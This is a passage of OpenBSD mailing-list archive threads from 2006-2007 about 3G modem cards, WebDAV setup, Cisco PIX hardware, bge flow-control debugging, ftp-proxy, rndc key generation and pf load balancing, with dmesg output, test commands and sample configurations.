Model: Merlin XU870 ExpressCard
Revision: 9.2.00.0-00  [2006-08-03 13:07:27]
IMEI: xxx
+GCAP: +CGSM,+DS,+ES

OK



dmesg:

Mar 27 16:45:40 n800c /bsd: OpenBSD 4.1-beta (GENERIC) #1410: Sun Feb 25 19:55:40 MST 2007
...
Mar 27 16:45:54 n800c /bsd: ohci2 at cardbus0 dev 0 function 0 "NEC USB" rev 0x43: irq 11, version 1.0
Mar 27 16:45:54 n800c /bsd: usb3 at ohci2: USB revision 1.0
Mar 27 16:45:54 n800c /bsd: uhub3 at usb3
Mar 27 16:45:54 n800c /bsd: uhub3: NEC OHCI root hub, rev 1.00/1.00, addr 1
Mar 27 16:45:54 n800c /bsd: uhub3: 3 ports with 3 removable, self powered
Mar 27 16:45:54 n800c /bsd: ohci3 at cardbus0 dev 0 function 1 "NEC USB" rev 0x43: irq 11, version 1.0
Mar 27 16:45:55 n800c /bsd: usb4 at ohci3: USB revision 1.0
Mar 27 16:45:55 n800c /bsd: uhub4 at usb4
Mar 27 16:45:55 n800c /bsd: uhub4: NEC OHCI root hub, rev 1.00/1.00, addr 1
Mar 27 16:45:55 n800c /bsd: uhub4: 2 ports with 2 removable, self powered
Mar 27 16:45:58 n800c /bsd: umsm0 at uhub3 port 1
Mar 27 16:45:58 n800c /bsd:
Mar 27 16:45:58 n800c /bsd: umsm0: Novatel Wireless Novatel Wireless HSDPA Modem, rev 1.10/0.00, addr 2

Mar 27 16:45:58 n800c /bsd: ucom0 at umsm0 portno 0



(although it drops into ddb if I eject it while running...)



regards / mvh,

Pete Vickers

[EMAIL PROTECTED] //  +47 48 17 91 00




On 27. mar. 2007, at 01.46, Jeff Quast wrote:


I've been happily using a umsm(4) sierra wireless aircard 580[1]. It
literally took less than 5 minutes to get this card moving in OpenBSD
with the ppp.conf example in umsm(4). Highly recommend this card, its
about $60 on ebay these days.

EVDO rev a was deployed to my area, and I was happy with the sierra
model (though not ecstatic over the latency), so I purchased a 'Sierra
wireless aircard 595' [2]. Somebody reported success in linux[3] with
this card, and umsm(4) listed this device as a maybe.

I forked out the $262, and Unfortunately this was not the 5-minute
success story as I had hoped for.

Although it attached to ucom0, if I used cu -l /dev/cuaU0 -s 230400, I
was not able to input an "at" (and receive "OK", such as on the 580).
I wondered if the 168Mhz laptop I was using it with was too old
(pcmcia type II? what? it fit...), so I built a fresh 1.2Ghz i386 and
used a pci<->pcmcia card with similar deadlock serial. This also
failed the same way on macppc.

There is a 30 day return limit on these, so I've re-activated the 580
(effectively disabling the new card) and returned this product. So my
question:

I am using sprintpcs as my provider. Can anybody report success with
the 'Merlin PC720' [4]?

1. http://www.sierrawireless.com/product/ac580.aspx
2. http://www.sierrawireless.com/product/ac595.aspx
3. http://www.pbandjelly.org/2006/12/sierra-wireless-aircard-595-configuration-sprintpcs/

4. http://www.novatelwireless.com/products/merlin/merlin-pc720.html

Thanks,
jdq




Re: Distributed File System

2007-04-17 Thread Pete Vickers
try web DAV - works a treat for me on OpenBSD with linux, Mac & windows clients...


/pete


On 17 Apr 2007, at 2:28 AM, Rico Secada wrote:


Hi all.

At work I am experiencing with setting up some distributed file system, at the current moment working with NFS. The problem is that it is being setup at work and people, from their homes, need to be able to mount the system.

I have no prior experience in this, except for setting up and using NFS across a LAN.

I would greatly appreciate any recommendations regarding security, effectiveness and other advices!

I have been thinking about tunneling NFS over SSH2, and possibly using some kind of cache, but I do not know if this is actually the best approach. I have also been thinking about using AFS as posted before.

Also perhaps, but not necessary, support for Windows could be needed in the long run.

What are you guys using and how is it setup?

Best and kind regards!

Rico.




Re: running OpenBSD on switch hardware

2007-04-20 Thread Pete Vickers

Pete Vickers

[EMAIL PROTECTED] |  +47 48 17 91 00

Systemnet AS


On 20 Apr 2007, at 10:42 AM, Claudio Jeker wrote:


On Fri, Apr 20, 2007 at 09:48:44AM +0200, Toni Mueller wrote:

Hi Claudio,

On Fri, 06.04.2007 at 12:09:38 +0200, Claudio Jeker <[EMAIL PROTECTED]> wrote:
Even the most expensive Cisco/Foundry/Extreme switches have not the CPU
power to route or filter packets.


how comes they boast running BGP and such stuff? Eg. Cisco 6509 and up,
or Extreme Black Diamond?  This requires real routing capabilities,
doesn't it?



Depends on your definition of routing capabilities. Layer 3 switches
(ab)use the CAM to do route lookups. For example the Cisco 7600 switching
router is able to route/switch at high pps rates under normal (lab)
circumstances but they start to thrash when your network is under a DDoS
attack. This comes from the fact that the CAM table is overflooded and so
many packets are redirected to the CPU for a slow routing lookup.
Most L3 switches have small CAM tables and so only small routing tables
can be handled efficiently on those systems (small as in <20'000 routes
which is nothing compared to the 215'000 bgp prefixes seen on a full
view).
Also note that switching router do lookups in HW so any feature that is
not part of the HW engine needs help from the main CPU. Tunneling, IPsec,
stateful filtering, L2TP, MPLS VPN and so on are either not available or
are done fully in software.

L3 switches can be compared to running a system with 64M Ram and 4GB of
swap. Paging and swapping makes the box comparable to one with 4GB of RAM
until your running processes start to use more than the 64M available.

--
:wq Claudio



Hi,

With SUP32/SUP720 and PFC2/3 this is much less a problem, as stated below. In fact, you can do a lot of config on the TCAM itself to mitigate DDoS associated problems:


http://www.cisco.com/en/US/products/hw/switches/ps708/products_white_paper09186a00800c9470.shtml#wp43045


/Pete



RFC 3623 support in OSPFd

2007-06-04 Thread Pete Vickers

Hi,

I'm trying to use OSPFd in a 'high availability' environment, where its next-hop h/a pair (mis)use RFC3623 (Graceful OSPF Restart) to provide rapid failover between nodes. However it appears OSPFd doesn't support this?


Before I dig into this, can norby/claudio/henning cast any light on the subject?



# uname -a
OpenBSD lab-netrax1.test 4.1 GENERIC#1099 sparc64


/Pete



Re: openbsd on cisco hardware?

2006-11-13 Thread Pete Vickers
most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the past, nothing special except flash boot.


pix515e# sh ver
...
Hardware:   PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff0, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
...
0: Ext: Ethernet0   : address is 0012.00e1.cd67, irq 10
1: Ext: Ethernet1   : address is 0012.00e1.cd68, irq 11
2: Ext: Ethernet2   : address is 000e.0c59.bd1a, irq 11
...
Interface Ethernet0 "outside", is up, line protocol is up
  Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
...

they usually even come with a (non functioning under PIXOS) USB port too.



/Pete


On 13. nov. 2006, at 04.30, Jason George wrote:

I know this is likely not possible for a number of reasons but I figured I'd
ask: are there or have there been any plans to port openbsd to run on cisco
hardware?

googling for something like this is not very productive since the CARP vs. VRRP
and firewall interoperation links dominate searches with "cisco openbsd" in them.



Older Cisco routers will typically have a Motorola 68k or some MIPS-based
processor.  These devices will also usually have minimal RAM (1 to 4M).  Not
exactly a great setup for a target platform...  I seem to recall that the
030-based Mot systems may have also been lacking in a proper MMU, but I could be
wrong.  I'm sure I'll be corrected by someone on the list.

Newer gear will have a MIPS or PowerPC processor in them.

x86 PIX boxes could conceivably be a target platform, but their lack of
storage would require a flashboot-style installation, and thus would not be
supported in an official manner, if even they were made to boot successfully.

The same would go for the non-x86 modern gear.

Frankly, Cisco's devices aren't even price-attractive, so as much as it would
be mildly interesting to run OpenBSD on some PIX 515 boxes, it's a waste of
time and money.

--Jason




Re: openbsd on cisco hardware?

2006-11-13 Thread Pete Vickers

Apples & oranges I believe, this *might* be why:

[EMAIL PROTECTED] ~/Desktop> file pix706.bin bsd.rd floppy40.fs

pix706.bin:  x86 boot sector

bsd.rd:  ELF 32-bit LSB executable, Intel 80386, version 1  
(SYSV), statically linked, not stripped


floppy40.fs: x86 boot sector

/Pete


On 13. nov. 2006, at 16.06, Jason George wrote:


most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the
past, nothing special except flash boot.

pix515e# sh ver
...
Hardware:   PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff0, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
...
0: Ext: Ethernet0   : address is 0012.00e1.cd67, irq 10
1: Ext: Ethernet1   : address is 0012.00e1.cd68, irq 11
2: Ext: Ethernet2   : address is 000e.0c59.bd1a, irq 11
...
Interface Ethernet0 "outside", is up, line protocol is up
  Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
...

they usually even come with a (non functioning under PIXOS) USB port
too.



I grabbed an old PIX 501 off the shelf... no such luck booting a  
standard i386

ramdisk image.


CISCO SYSTEMS PIX-501
Embedded BIOS Version 4.3.200 07/31/01 15:58:22.08
Compiled by morlee
16 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class  Irq
 00  00  00   1022   3000  Host Bridge
 00  11  00   8086   1209  Ethernet   9
 00  12  00   8086   1209  Ethernet   10

Cisco Secure PIX Firewall BIOS (4.2) #6: Mon Aug 27 15:09:54 PDT 2001
Platform PIX-501
Flash=E28F640J3 @ 0x300

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Flash boot interrupted.
0: i8255X @ PCI(bus:0 dev:17 irq:9 )
1: i8255X @ PCI(bus:0 dev:18 irq:10)

Using 1: i82557 @ PCI(bus:0 dev:18 irq:10), MAC: 0011.935f.08c6
Use ? for help.
monitor> addr 192.168.4.234
address 192.168.4.234
monitor> server 192.168.4.3
server 192.168.4.3
monitor> file bsd.rd
file bsd.rd
monitor> ping 192.168.4.3
Sending 5, 100-byte 0xc3f8 ICMP Echoes to 192.168.4.3, timeout is 4  
seconds:

!
Success rate is 100 percent (5/5)
monitor> tftp
tftp [EMAIL PROTECTED]
[snip]

Received 4938658 bytes
Bad magic number (0xab00450)
monitor>




Re: WebDAV

2006-12-03 Thread Pete Vickers

Hi,

I've used it problem free with osx & windows clients; it should
probably only be available over https:



    DocumentRoot "/var/www/secure_content"
    ServerName whatever.com
    ServerAlias www.whatever.com
    ServerAdmin [EMAIL PROTECTED]
    ErrorLog logs/error_log
    TransferLog logs/access_log

    DAV On
    AuthType Basic
    AuthName "whatever.com network disk"
    AuthUserFile /var/www/conf/passwd
    AllowOverride None
    Require valid-user
    Options None
    LOCK UNLOCK>

    DAVLockDB /dav_scratch/DAVLock
    DAVMinTimeout 600
    SSLEngine on
    SSLCertificateFile    /etc/ssl/server.crt
    SSLCertificateKeyFile /etc/ssl/private/server.key
    CustomLog logs/ssl_request_log \
        "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



/Pete



On 1. des. 2006, at 22.00, Gaby Vanhegan wrote:


Hi,

Although the mail archives have little on the topic, as does google,
are there any major security concerns I should be aware of when
installing mod_dav under the stock OpenBSD apache1.3, with apache
chrooted?

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
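
The container directives of the configuration quoted above were lost in the archive, so here is an added, self-contained mod_dav vhost for the stock chrooted Apache 1.3 on OpenBSD. This is example configuration, not Pete's original; the host name, the /dav location, the group file and all file paths are assumptions. It makes explicit the two things a reviewer would ask about: Basic credentials are only ever accepted over TLS, and write methods are limited to one group.

```apache
# Added example, not the config from the post above. Assumed names:
# dav.example.com, /dav, /conf/dav.passwd, /conf/dav.group, /dav_scratch.
<VirtualHost _default_:443>
    ServerName   dav.example.com
    DocumentRoot /var/www/secure_content
    ErrorLog     logs/error_log
    TransferLog  logs/access_log

    SSLEngine on
    SSLCertificateFile    /etc/ssl/server.crt
    SSLCertificateKeyFile /etc/ssl/private/server.key

    # httpd(8) chroots to /var/www after reading the config. Certificates
    # are read before the chroot, but the lock DB and the auth files are
    # opened per request, so these paths are relative to the chroot.
    DAVLockDB /dav_scratch/DAVLock
    DAVMinTimeout 600

    <Location /dav>
        DAV On
        Options None
        AllowOverride None

        # Refuse the request unless it arrived over TLS, even if this
        # Location is ever also mapped into a plain-HTTP vhost.
        SSLRequireSSL

        AuthType Basic
        AuthName "network disk"
        AuthUserFile  /conf/dav.passwd
        AuthGroupFile /conf/dav.group

        # Read-only DAV methods: any authenticated user.
        <Limit GET HEAD OPTIONS PROPFIND>
            Require valid-user
        </Limit>
        # Everything that can change content: members of 'editors' only.
        # (A bare 'Require valid-user' outside the <Limit> would also
        # satisfy these methods, because Require lines are OR-ed.)
        <LimitExcept GET HEAD OPTIONS PROPFIND>
            Require group editors
        </LimitExcept>
    </Location>
</VirtualHost>
```

Start httpd with -DSSL (httpd_flags in rc.conf.local) so the 443 listener exists, create the password file with htpasswd(1) as /var/www/conf/dav.passwd, and put the editors' user names in /var/www/conf/dav.group as "editors: alice bob".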




Performance problems with bge under OpenBSD4.0/i386

2007-02-14 Thread Pete Vickers

Hi,

I'm trying to track down the cause of poor network performance under
OpenBSD4.0/i386 on HP Proliants (DL380-G4 and DL360-G4p), which seems
to concern Ethernet 802.3x flow control on the bge NICs.



Test topology is:

HP DL380-G4
  int bge0 (BCM5704C auto at 1000baseT full-duplex)
|
|
  int Gig 13/6  (auto at 1000baseT full-duplex)
Cisco 6513 chassis + WS-X6548-GE-TX + WS-X6748-GE-TX
  int Gig 12/47 (auto at 1000baseT full-duplex)
|
|
  int bge0 (BCM5704C auto at 1000baseT full-duplex)
HP DL360-G4p


Test traffic is generated with:

On Source:  dd if=/dev/zero bs=1k count=1 | nc _peer_ 1234
On Sink:    nc -l 1234 > /dev/null



With 4.0-release kernel (GENERIC#1107), the bge driver does not  
negotiate flowcontrol with the switch:


switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6
Port     Send FlowControl  Receive FlowControl  RxPause TxPause
         admin    oper     admin    oper
Gi12/47  desired  off      desired  off         0       0
Gi13/6   desired  off      desired  off         0       0


Network traffic is very slow and the receiving host reports  
significant 'Input errors' on the NIC interface after transfer:


source~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:18:fe:32:2e:4a     1050     0     1276     0     0

source~> dd if=/dev/zero bs=1k count=100000 | nc _peer_ 1234
100000+0 records in
100000+0 records out
102400000 bytes transferred in 13.219 secs (7746244 bytes/sec)
source~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:18:fe:32:2e:4a    52684     0    73166     0     0


sink~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:17:a4:45:f5:25       79     0      106     0     0

sink~> nc -l 1234 > /dev/null
sink~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:17:a4:45:f5:25    70841    11    50894     0     0





With 4.0-snapshot kernel (GENERIC#1362), the bge driver now  
negotiates flow control:


switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6
Port     Send FlowControl  Receive FlowControl  RxPause TxPause
         admin    oper     admin    oper
Gi12/47  desired  on       desired  on          0       0
Gi13/6   desired  on       desired  on          0       0

However, the transfer is still very slow, and the receiving host  
still reports significant 'Input errors' on the NIC interface after  
transfer:


source~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:18:fe:32:2e:4a     1459     0     1762     0     0

source~> dd if=/dev/zero bs=1k count=100000 | nc _peer_ 1234
100000+0 records in
100000+0 records out
102400000 bytes transferred in 14.120 secs (7251650 bytes/sec)
source~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:18:fe:32:2e:4a    53240     0    73457     0     0



sink~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:17:a4:45:f5:25       89     0       98     0     0

sink~> nc -l 1234 > /dev/null
sink~> netstat -i -I bge0 | grep -e Name -e Link
Name    Mtu   Network     Address              Ipkts Ierrs    Opkts Oerrs Colls
bge0    1500  <Link>      00:17:a4:45:f5:25    70849     9    51186     0     0




To summarise, it seems as though flow-control is negotiated for both
TX & RX in the recent bge driver, but is only functional for TX (if
at all). The only relevant source change I can find is:


http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/pci/if_bge.c.diff?r1=1.202&r2=1.203&f=h
"Flow control support for bge(4)/brgphy(4).  From brad@ based on code
from NetBSD"

which includes the comment /* We can do both TXPAUSE and RXPAUSE. */

Setting 'ifconfig bge0 debug' provides no additional output. I have
also repeated the tests with several different servers, NICs (all
bge), cables and switches to rule out faulty device issues.



Has anyone any ideas on fixes for this, or how to debug the issue
further?


Dmesg below


/Pete



# dmesg
OpenBSD 4.0-current (GENERIC) #1362: Fri Feb  9 14:26:43 MST 2007
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,H

Re: Performance problems with bge under OpenBSD4.0/i386

2007-02-15 Thread Pete Vickers

Very Interesting.

On the switch I can set the port flow-control to on, off or  
desirable. The following is the blurb on those configuration options:



Gigabit Ethernet Flow Control Keyword Functions, Keywords : Function

receive on: The port uses flow control dictated by the neighbor port.

receive desired: The port uses flow control if the neighbor port uses  
it, and does not use flow control if the neighbor port does not use it.


receive off: The port does not use flow control, regardless of  
whether flow control is requested by the neighbor port.


send on: The port sends flow-control frames to the neighbor port.

send desired: The port sends flow-control frames to the neighbor port  
if the neighbor port asks to use flow control.


send off: The port does not send flow-control frames to the neighbor  
port.


However, irrespective of what I configure the port flow-control to on
the switch (and then reboot the OpenBSD host, to be sure of correct
interface initialisation) I cannot get ifconfig to report {tx|rx}pause.


Is this likely to be a driver problem, or is there some broken flash
code on the bge NIC (which I could possibly update)?



/Pete

On 14. feb. 2007, at 22.42, Mark Kettenis wrote:


From: Pete Vickers <[EMAIL PROTECTED]>
Date: Wed, 14 Feb 2007 13:33:25 +0100

# ifconfig bge0
bge0: flags=8843 mtu 1500
 lladdr 00:17:a4:45:f5:25
 groups: egress
 media: Ethernet autoselect (1000baseT full-duplex)
 status: active
 inet6 fe80::217:a4ff:fe45:f525%bge0 prefixlen 64 scopeid 0x1
 inet x.x.x.x netmask 0xff00 broadcast x.x.x.x


This suggests flow control has *not* been negotiated.  With msk(4), I
get:

borodin$ ifconfig msk0
msk0: flags=8843 mtu 1500
        lladdr 00:16:cb:a2:87:67
        groups: egress
        media: Ethernet autoselect (1000baseT full-duplex,rxpause,txpause)
        status: active
        inet6 fe80::216:cbff:fea2:8767%msk0 prefixlen 64 scopeid 0x1
        inet 192.168.0.17 netmask 0xffffff00 broadcast 192.168.0.255




Re: FTP-Proxy

2006-09-20 Thread Pete Vickers

On 20. sep. 2006, at 10.22, Alan Smith wrote:

*> or a machine with dual nics - one inside and one outside the  
firewall.

*
*Rod Dorman wrote:
*This is effectively getting rid of the PIX!
*
*If  its got both an inside and outside interface it can be  
configured as
*a gateway such that any inside host can get outside completely  
bypassing

*the PIX.  Are you sure your network admins are OK with that?

Ok - never write technical mails after 14 hours on a plane - they
make no sense!!!  In a nutshell, I need to know if I can use ftp-
proxy on a machine inside our current PIX firewall. If it will only
run on a machine running PF acting as the main firewall/gateway
then I'm out of luck. I will not be using it if the only way would
be a nic inside and outside of the firewall.


Sorry for the confusion (and thanks for the reply Rod)

Alan


Hi,

A few thoughts for you to explore:

1. A good number of web browsers etc support authenticated ftp
'upload' via a proxy (e.g. squid), thus fixing your problem -
googling will direct you on this...


2. if you can put an openbsd box on the inside of the PIX, and make  
the client traffic go via it (e.g. their default gateway), then you  
can use the ftp-proxy.


3. recent PIXen support the WCCP2 protocol, as does squid (I believe it's
just a GRE tunnel basically), so maybe you could run squid on openbsd
to direct traffic appropriately, once redirected from the PIX.


food for thought anyway

/Pete
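
The second option above (an OpenBSD box on the inside that the clients route through) needs only a handful of pf rules. The following is an added example pf.conf fragment for the ftp-proxy(8) that ships with 4.0, not from the thread; the interface names, the LAN prefix and the proxy port are assumptions:

```pf
# Added example, not from the thread. Assumed: bge0 faces the PIX, bge1 the
# LAN, 192.168.1.0/24 is the LAN. ftp-proxy(8) listens on 127.0.0.1:8021
# by default and the PIX keeps doing the NAT towards the Internet.
ext_if = "bge0"
int_if = "bge1"
lan    = "192.168.1.0/24"
proxy  = "127.0.0.1"

# ftp-proxy(8) installs its per-session nat/rdr/pass rules in these anchors.
nat-anchor "ftp-proxy/*"
rdr-anchor "ftp-proxy/*"

# Divert every FTP control connection from the LAN to the local proxy.
rdr pass on $int_if proto tcp from $lan to any port 21 -> $proxy port 8021
anchor "ftp-proxy/*"

block in log all

# LAN clients may use this box as their default gateway.
pass in  on $int_if from $lan to any keep state
pass out on $ext_if from $lan to any keep state

# The proxy itself opens the control channel to the real server from the
# gateway's own address.
pass out on $ext_if proto tcp from ($ext_if) to any port 21 keep state
```

Enable forwarding with net.inet.ip.forwarding=1 in /etc/sysctl.conf and set ftpproxy_flags="" in /etc/rc.conf.local. Because the PIX still performs the NAT in front of this box, active-mode data connections (the server connecting back to the client) will be dropped at the PIX unless it is told otherwise; tell the clients to use passive mode, which the proxy handles entirely on the inside.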



rndc/named automatic key generation

2006-09-27 Thread Pete Vickers
Following OpenBSD's automatic generation of ssh and isakmp keys,
perhaps the following would be a worthwhile addition to /etc/rc to
generate a key/config for rndc/named.


==
if [ ! -f /etc/rndc.conf ]; then
	echo -n "rndc-confgen: generating new RNDC key... "
	# rndc-confgen prints rndc.conf followed by the matching named.conf
	# stanza as '# ' comment lines; the grep keeps those stanza lines and
	# drops the '# Start of', '# End of' and '# Use with' banner lines.
	if /usr/sbin/rndc-confgen | tee /etc/rndc.conf \
	    | grep '^# [^SEU]' >> /var/named/etc/named.conf; then
		chown root:named /etc/rndc.conf /var/named/etc/rndc.conf
		chmod 640 /etc/rndc.conf /var/named/etc/rndc.conf
		echo done.
	else
		echo failed.
	fi
fi
==

Notes:
1. I stopped short of piping through a "sed '/^#//'" so that it still  
remains disabled by default.
2. I guess there is a better way than the late chown/chmod calls, but  
I guess it's ok, since we are still pre-login during rc.


/Pete



Re: rndc/named automatic key generation

2006-09-29 Thread Pete Vickers

On 28. sep. 2006, at 02.30, Spruell, Darren-Perot wrote:


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]

Following OpenBSD's automatic generation of ssh and isakmp
keys, perhaps the following would be a worthwhile addition to
/etc/rc to generate a key/config for rndc/named.


/etc/rc already handles that during named startup.

DS



Ahh, yep, should have read through the rest of /etc/rc before posting...


While I'm there though, is there any reason (other than historical)
for the following two anomalies:


- the installer script turns sshd on in /etc/rc.conf rather than /etc/ 
rc.conf.local


- the installer script's line for ntpd in /etc/rc.conf.local doesn't
use "" like all the examples in /etc/rc


if it's just a matter of diffs, I'm more than willing to try and  
submit them...



/Pete



bge problems on HP DL360 G4p with -current

2006-10-06 Thread Pete Vickers

Hi,

I'm running an OpenBSD/i386 recent snapshot on a few 'HP DL360 G4p's,  
all seems good apart from the first NIC (bge0) will not see the LAN.


An 'ifconfig bge0' output cycles between "media: Ethernet autoselect  
(none)" and "media: Ethernet autoselect (loopback)", with "status: no  
carrier" and will not connect to the LAN.


However if I relocate the cable to bge1 then it connects perfectly  
and 'ifconfig bge1' shows "media: Ethernet autoselect (1000baseT full- 
duplex)" and "status: active".


I've tried 5 identical machines, with different switch ports and  
cables, and behaviour is consistent: bge0 always fails, and bge1  
always works. I've also tried moving the NICs from IRQ 7 to IRQ5,  
(they are forced to use same IRQ) in the BIOS without effect. Thus  
I'm pretty sure the problem is not switch, cabling or server  
hardware. Adding the debug flag on bge0 reveals nothing in logs.


In the short term I can run on just bge1, but I'm hoping to do NIC/
switch redundancy via trunk(4) so I'll need bge0. Any suggestions
greatly received.


Full dmesg below.


thanks,

/Pete


[EMAIL PROTECTED] ~>cat /var/run/dmesg.boot
OpenBSD 4.0-current (GENERIC) #1134: Mon Oct  2 19:44:53 MDT 2006
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- 
CPL,EST,CNXT-ID,CX16

cpu0: EST: strange msr value 0x112d112d
real mem  = 2147000320 (2096680K)
avail mem = 1950441472 (1904728K)
using 4256 buffers containing 107454464 bytes (104936K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @  
0xf, SMBIOS rev. 2.3 @ 0xec000 (73 entries)

bios0: HP ProLiant DL360 G4p
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 6300ESB LPC" rev  
0x00)

pcibios0: PCI bus #13 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0c
ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0c
pci1 at ppb0 bus 13
ppb1 at pci0 dev 4 function 0 "Intel MCH PCIE" rev 0x0c
pci2 at ppb1 bus 6
ppb2 at pci2 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci3 at ppb2 bus 7
ppb3 at pci2 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci4 at ppb3 bus 10
ppb4 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0c
pci5 at ppb4 bus 3
ppb5 at pci0 dev 28 function 0 "Intel 6300ESB PCIX" rev 0x02
pci6 at ppb5 bus 2
ciss0 at pci6 dev 1 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 7
ciss0: 1 LD, HW rev 1, FW 2.68/2.68
scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0:  SCSI0 0/ 
direct fixed
sd0: 140006MB, 140006 cyl, 64 head, 32 sec, 512 bytes/sec, 286734240  
sec total
bge0 at pci6 dev 2 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704  
B0 (0x2100): irq 7, address 00:18:fe:32:1e:08

brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
bge1 at pci6 dev 2 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704  
B0 (0x2100): irq 7, address 00:18:fe:32:1e:07

brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
uhci0 at pci0 dev 29 function 0 "Intel 6300ESB USB" rev 0x02: irq 5
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
uhci1 at pci0 dev 29 function 1 "Intel 6300ESB USB" rev 0x02: irq 5
usb1 at uhci1: USB revision 1.0
uhub1 at usb1
uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub1: 2 ports with 2 removable, self powered
"Intel 6300ESB WDT" rev 0x02 at pci0 dev 29 function 4 not configured
"Intel 6300ESB APIC" rev 0x02 at pci0 dev 29 function 5 not configured
ehci0 at pci0 dev 29 function 7 "Intel 6300ESB USB" rev 0x02: irq 7
usb2 at ehci0: USB revision 2.0
uhub2 at usb2
uhub2: Intel EHCI root hub, rev 2.00/1.00, addr 1
uhub2: 4 ports with 4 removable, self powered
ppb6 at pci0 dev 30 function 0 "Intel 82801BA AGP" rev 0x0a
pci7 at ppb6 bus 1
vga1 at pci7 dev 3 function 0 "ATI Rage XL" rev 0x27
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
"Compaq iLO" rev 0x01 at pci7 dev 4 function 0 not configured
"Compaq iLO" rev 0x01 at pci7 dev 4 function 2 not configured
ichpcib0 at pci0 dev 31 function 0 "Intel 6300ESB LPC" rev 0x02
pciide0 at pci0 dev 31 function 1 "Intel 6300ESB IDE" rev 0x02: DMA,  
channel 0 configured t

Re: pf load balancing and failover

2006-10-26 Thread Pete Vickers

Hi,


If I recall correctly, slbd adds new rules to pf for each incoming  
tcp session. Since I couldn't get it to work (old version) I do not  
know what the session and Sources tables will look like, but I  
suspect there will be no problems with them in slbd. Client-server  
association is maintained by slbd and implemented with separate rules  
for each tcp session.


This seems a bit ineffective and rather pointless since pf has the  
load balancing functionality built in.


The problems with using pf and a health checking script are related to
removal of failed backends. There are two separate issues:


 1) When using sticky-address in the rdr rules, client-server
    associations are added to the internal Sources table.
    It is impossible to remove entries for a single backend from this
    table. If a backend fails and is removed from the rdr destination
    table, this table will have to be flushed, making all clients end
    up on new backends, which is unacceptable in many configurations.
    If this table is not cleared then the rdr destination table is not
    inspected for client IPs found in the Sources table. These clients
    will still be sent to the failed and removed backend.
    Preferably entries could be removed from this table based on
    source-IP and backend-IP:backend-port, and maybe even the virtual
    service IP:port or a pf rule number.

 2) TCP sessions to a failed backend will continue to exist after the
    backend is removed from the rdr destination table. As of today these
